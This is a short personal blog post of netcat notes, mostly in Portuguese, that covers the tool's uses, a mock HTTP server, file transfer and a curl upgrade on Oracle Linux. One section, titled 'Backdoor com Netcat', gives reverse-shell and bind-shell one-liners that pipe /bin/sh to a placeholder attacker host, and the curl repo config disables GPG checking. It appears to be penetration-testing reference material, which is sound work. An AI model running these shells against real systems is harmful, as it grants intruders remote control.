Saturday, September 12, 2015

nc (netcat) - canivete suiço para conexoes TCP e UDP

The nc (or netcat) utility is used for just about anything under the sun
involving TCP or UDP. It can open TCP connections, send UDP packets, lis-
ten on arbitrary TCP and UDP ports, do port scanning, and deal with both
IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error
messages onto standard error instead of sending them to standard output,
as telnet(1) does with some.

Common uses include:

· simple TCP proxies
· shell-script based HTTP clients and servers
· network daemon testing
· a SOCKS or HTTP ProxyCommand for ssh(1)
· and much, much more
---------------------------------------------------------------------
Backdoor com Netcat
***********************
http://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem
http://www.michaelboman.org/books/penetration-testing-notes/netcat

Com Backpipe:

attacker# nc ip_do_atacante -nvl 443
victim# mknod /tmp/backpipe p
victim# /bin/sh 0</tmp/backpipe | nc ip_do_atacante 443 1>/tmp/backpipe
or
victim# /bin/sh -c "/bin/sh 0</tmp/backpipe | nc ip_do_atacante 443 1>/tmp/backpipe"


Sem Backpipe:

victm# nc -nvlp 80 | /bin/sh | nc ip_do_atacante 443

(term1)attacker# sudo nc ip_do_atacante -nvl 443
(term2)attacker# nc ip_da_vitima 80


Servidor Web Mock
*********************
arquivo: teste.http
-------------------------
HTTP/1.1 200 OK    
Server: SimpleHTTP/0.6 Python/2.7.1
Date: Wed, 09 Sep 2015 19:45:04 GMT
Content-type: application/octet-stream
Last-Modified: Fri, 04 Sep 2015 12:21:46 GMT
Transfer-Encoding: chunked

4
Wiki
5
pedia
3
 in
7
chunks.
0
*******************
server# nc 192.168.1.36 -l  8001 < test.http
client# curl -v --http1.1 http://192.168.1.36:8001/test >/dev/null

Transferir arquivo
**********************
server# nc -l 1234 < examples.out
client# nc 192.168.1.35 1234 > /tmp/examples.in


*************************************
Atualizar curl no oracle linux para suporte da opcao --http1.1

 1) Crie um novo arquivo chamado /etc/yum.repos.d/city-fan.repo 
2) Cole o seguinte conteudo:
    [CityFan]
    name=City Fan Repo
    baseurl=http://www.city-fan.org/ftp/contrib/yum-repo/rhel5/x86_64/
    enabled=1
    gpgcheck=0
3) Digite:
sudo yum clean all && sudo yum install curl

Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Blog Archive